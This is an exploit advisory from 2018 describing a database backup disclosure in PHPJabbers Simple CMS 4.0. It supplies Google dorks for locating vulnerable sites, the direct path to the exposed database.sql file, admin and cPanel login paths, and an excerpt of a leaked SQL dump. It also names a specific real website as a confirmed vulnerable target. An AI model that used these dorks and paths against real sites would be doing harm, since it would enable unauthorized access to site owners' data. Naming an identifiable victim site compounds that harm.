facebook facebook twitter rss

Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure

Author: KingSkrupellos , Published: 21-12-2018
#################################################################################################

# Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
# Software Download Link : phpjabbers.com/simple-cms/
# Demo Software : demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
+ Login Details => Email: admin@admin.com Password: pass
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0
# Exploit Risk : Medium
# Google Dorks : intext:''PHP Scripts Copyright © 2018 StivaSoft Ltd''
+ intext:''Hotel Booking script by PHPJabbers.com -
+ intext:''© Copyright Dravis Interests 2003-2018 Website by Racing River Website Solutions''
+ intext:''Website by Racing River Website Solutions''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/scms4/index.php?controller=Admin&action=login

# CPanel Login Path :

p3plcpnl0800.prod.phx3.secureserver.net:2083

# Exploit :

/scms4/app/config/database.sql

#################################################################################################

# Example SQL Dump Information => dravisinterests.com

DROP TABLE IF EXISTS `simple_cms_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_files` (

DROP TABLE IF EXISTS `simple_cms_roles`;
CREATE TABLE IF NOT EXISTS `simple_cms_roles` (

DROP TABLE IF EXISTS `simple_cms_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_sections` (

DROP TABLE IF EXISTS `simple_cms_users`;
CREATE TABLE IF NOT EXISTS `simple_cms_users` (

DROP TABLE IF EXISTS `simple_cms_users_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (

DROP TABLE IF EXISTS `simple_cms_users_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (

DROP TABLE IF EXISTS `simple_cms_options`;
CREATE TABLE IF NOT EXISTS `simple_cms_options` (

INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
(1, 'admin', 'T'),
(2, 'editor', 'T');

#################################################################################################

# Example Vulnerable Site =>

[+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept for Vuln ] => archive.is/43J4N

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :